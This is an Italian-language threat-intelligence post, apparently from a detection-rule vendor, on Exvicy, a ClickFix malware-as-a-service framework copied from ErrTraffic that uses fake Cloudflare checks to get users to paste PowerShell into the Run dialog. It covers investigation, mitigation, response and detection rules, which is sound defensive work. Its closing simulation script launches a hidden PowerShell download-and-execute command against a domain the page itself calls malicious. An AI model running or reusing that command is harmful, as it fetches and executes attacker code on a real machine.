SOC Prime Bias: High

24 Sep 2026 06:51 UTC

Exvicy: Un clone del framework di distribuzione di malware ErrTraffic

Author Photo
SOC Prime Team linkedin icon Segui
Exvicy: Un clone del framework di distribuzione di malware ErrTraffic
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Riepilogo

Exvicy è un framework emergente di Malware-as-a-Service (MaaS) denominato ClickFix, promosso nei forum di criminalità informatica. Utilizza l’ingegneria sociale imitando le sfide Turnstile di Cloudflare per convincere gli utenti a eseguire comandi PowerShell dannosi tramite la finestra di dialogo Esegui di Windows. Il framework copia da vicino ErrTraffic, riutilizzando ampie porzioni del suo codice JavaScript e delle tecniche di offuscamento.

Investigazione

Gli analisti TDR si sono basati su uno screenshot di un pannello di amministrazione condiviso sul forum Exploit.IN per scoprire infrastrutture C2 attive. Analizzando specifici nameserver di Cloudflare e modelli di registrazione di domini, i ricercatori hanno identificato più domini dannosi e siti Web WordPress compromessi. L’analisi tecnica ha confermato un ampio riutilizzo del codice ErrTraffic, comprese funzioni JavaScript distintive e logica anti-analisi.

Mitigazione

Le organizzazioni dovrebbero implementare un filtraggio web robusto per bloccare domini noti dannosi e TLD sospetti associati a queste campagne. La protezione endpoint dovrebbe monitorare e limitare l’esecuzione anomala di PowerShell, in particolare i comandi coinvolgenti irm or iex. Gli utenti dovrebbero anche essere formati per riconoscere i prompt di ingegneria sociale che li istruiscono a utilizzare scorciatoie da tastiera come Win+R per eseguire comandi.

Risposta

Se viene rilevata attività di Exvicy, gli host interessati devono essere isolati immediatamente per interrompere l’esecuzione di ulteriori comandi o la consegna di payload. Gli addetti alla risposta dovrebbero esaminare i log operativi di PowerShell per identificare i comandi eseguiti e le connessioni di rete correlate. Gli indirizzi IP e i domini C2 noti dovrebbero essere bloccati al perimetro, seguiti da una ricerca per altri asset WordPress compromessi nell’ambiente.

Flusso di Attacco

Stiamo ancora aggiornando questa parte.

Rilevazioni

Comando e Controllo Sospetti tramite Richiesta DNS con Dominio di Primo Livello (TLD) Insolito (via dns)

Team SOC Prime
23 Set 2026

Voce RunMRU Sospetta con Semantica LOLBin (via registry_event)

Team SOC Prime
23 Set 2026

IOC (SourceIP) per rilevare: Exvicy: Una copia del framework di distribuzione malware ErrTraffic

Regole AI SOC Prime
23 Set 2026

IOC (DestinationIP) per rilevare: Exvicy: Una copia del framework di distribuzione malware ErrTraffic

Regole AI SOC Prime
23 Set 2026

Rilevazione di Esecuzione Comandi PowerShell Dannosi per il Malware Exvicy [Windows Powershell]

Regole AI SOC Prime
23 Set 2026

Esecuzione Comandi del Framework Exvicy tramite Scorciatoia Win + R [Creazione di Processi Windows]

Regole AI SOC Prime
23 Set 2026

Esecuzione di Simulazione

  • Narrativa & Comandi di Attacco: Un avversario fornisce a un utente un collegamento o documento dannoso tramite phishing. All’esecuzione (T1204.002), l’utente inavvertitamente avvia un processo PowerShell (T1059.001). L’obiettivo dell’attaccante è stabilire un punto d’appoggio scaricando un payload secondario. Per imitare il framework Exvicy, la riga di comando è costruita per includere il dominio specifico noto per essere dannoso recaptcha-check.com/8E9curHNH8UfAMLz per scaricare l’agente dannoso.

  • Script di Test di Regressione:

    # Script di simulazione per attivare la regola di rilevazione Exvicy.
    # Questo imita i modelli di riga di comando identificati nella regola Sigma.
    
    $maliciousUrl = "http://recaptcha-check.com/8E9curHNH8UfAMLz"
    $command = "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command `"IEX (New-Object Net.WebClient).DownloadString('$maliciousUrl')`""
    
    Write-Host "[+] Avvio della Simulazione: esecuzione del comando per attivare il rilevamento..."
    Start-Process powershell.exe -ArgumentList "-ExecutionPolicy Bypass -Command `"$command`""
    Write-Host "[+] Comando di simulazione inviato. Controlla SIEM per gli avvisi."
  • Comandi di Pulizia:

    # Pulizia: Nessun file permanente viene creato da questa specifica simulazione, 
    # ma assicuriamo che non vi siano processi PowerShell residui in esecuzione.
    Stop-Process -Name "powershell" -ErrorAction SilentlyContinue
    Write-Host "[+] Pulizia completata."